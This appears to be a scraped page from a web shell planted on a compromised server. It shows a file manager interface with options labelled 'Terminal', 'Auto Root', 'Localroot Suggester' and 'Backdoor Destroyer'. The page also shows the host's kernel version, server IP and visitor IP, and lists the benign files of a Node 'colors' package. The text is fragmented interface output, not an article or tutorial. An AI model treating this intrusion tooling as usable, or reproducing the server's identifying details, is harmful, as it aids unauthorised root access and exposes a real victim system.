Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.147.67.34
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
unp_probe /
node_modules /
colors /
lib /
Delete
Unzip
Name
Size
Permission
Date
Action
custom
[ DIR ]
drwxr-xr-x
2021-02-04 21:24
maps
[ DIR ]
drwxr-xr-x
2021-02-04 21:24
system
[ DIR ]
drwxr-xr-x
2021-02-04 21:24
colors.js
4.71
KB
-rw-r--r--
2015-06-17 12:52
extendStringPrototype.js
2.98
KB
-rw-r--r--
2015-06-17 12:57
index.js
362
B
-rw-r--r--
2015-06-17 12:52
styles.js
2.05
KB
-rw-r--r--
2014-11-24 23:54
Save
Rename
var colors = require('./colors'); module['exports'] = colors; // Remark: By default, colors will add style properties to String.prototype // // If you don't wish to extend String.prototype you can do this instead and native String will not be touched // // var colors = require('colors/safe); // colors.red("foo") // // require('./extendStringPrototype')();